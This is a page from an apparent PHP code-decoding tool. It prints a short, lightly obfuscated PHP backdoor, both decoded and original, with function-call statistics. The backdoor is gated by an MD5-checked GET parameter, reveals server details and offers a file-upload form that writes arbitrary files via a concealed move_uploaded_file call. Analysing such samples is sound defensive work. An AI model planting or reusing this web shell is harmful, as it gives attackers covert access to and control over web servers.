Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

if (md5(@$_GET['zzz']) == '57233161b8ae7e66c265460934ae0086') { echo php_uname() . "<..

Decoded Output download

<?  if (md5(@$_GET['zzz']) == '57233161b8ae7e66c265460934ae0086') { 
    echo php_uname() . "<br>" . getcwd() . "<br>"; 
    @$sa = $_FILES['file']['tmp_name']; 
    @$as = $_FILES['file']['name']; 
    echo "<form method='POST' enctype='multipart/form-data'><input type='file' name='file' /><input type='submit' value='UPload' /></form>"; 
    $w = "move_uplo"; $q = "aded_file"; $x = $w . $q; 
    $x($sa, $as); 
    exit();/*2e3300cd40ea092e5eeb579abe01e85a*/ 
} ?>

Did this file decode correctly?

Original Code

if (md5(@$_GET['zzz']) == '57233161b8ae7e66c265460934ae0086') {
    echo php_uname() . "<br>" . getcwd() . "<br>";
    @$sa = $_FILES['file']['tmp_name'];
    @$as = $_FILES['file']['name'];
    echo "<form method='POST' enctype='multipart/form-data'><input type='file' name='file' /><input type='submit' value='UPload' /></form>";
    $w = "move_uplo"; $q = "aded_file"; $x = $w . $q;
    $x($sa, $as);
    exit();/*2e3300cd40ea092e5eeb579abe01e85a*/
}

Function Calls

md5 1
getcwd 1
php_uname 1

Variables

None

Stats

MD5 d8dd287a710396d4de906c0233d54366
Eval Count 0
Decode Time 48 ms